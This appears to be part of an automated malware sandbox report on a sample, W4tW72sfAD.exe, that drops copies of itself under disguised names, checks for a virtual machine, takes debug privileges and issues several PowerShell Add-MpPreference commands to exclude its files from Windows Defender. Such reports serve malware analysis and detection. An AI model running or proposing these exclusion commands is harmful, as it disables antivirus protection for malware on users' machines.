Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 7048 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 6296 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 3192 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 5752 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep count: 4378 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep count: 437 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep count: 4815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep count: 4895 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 230 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep count: 3995 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep count: 4514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep count: 367 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8056 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7176 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7624 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3872 Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -599853s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676 Thread sleep time: -21600000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -598907s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -598203s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -598000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597719s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597563s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597344s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -597094s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596938s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596766s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596640s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596531s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596422s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596259s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -596107s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676 Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595954s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595828s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595719s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595580s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595438s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595266s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595140s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -595014s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594906s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594797s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594688s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594563s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594438s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594313s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594198s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -594078s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593969s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593844s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593735s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593610s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593485s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593360s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593250s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -593141s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592985s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592846s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592719s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592610s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592485s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592375s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592266s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592157s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -592032s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591903s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591797s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591688s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591578s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591468s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591360s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591235s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736 Thread sleep time: -591110s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1984 Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 1196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7500 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599671
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99883
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99766
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99657
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99544
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99422
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99313
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99199
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 99084
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98954
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98829
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98704
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98579
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98454
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98329
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98204
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 98094
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 97954
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597229
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597094
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596969
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596794
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596617
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 30000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 599853
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 3600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598907
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598203
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597344
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597094
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596938
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596766
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596640
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596531
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596422
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596259
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596107
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 300000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595954
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595828
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595580
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595140
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595014
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594906
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594313
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594198
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594078
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593969
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593844
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593735
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593250
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593141
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592985
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592846
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592375
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592157
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592032
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591903
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591578
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591468
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591235
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591110
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local
Source: W4tW72sfAD.exe, 00000000.00000002.1766850936.000000001B9CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: W4tW72sfAD.exe, juptXkyeRvGsIZrQGeVEsrnWhD.exe0.0.dr Binary or memory string: EE8hgfsJKrIo2qFkM8q
Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2747066121.000000001BE9D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: W4tW72sfAD.exe, 00000000.00000002.1775712295.000000001C03B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process token adjusted: Debug
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Process token adjusted: Debug
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
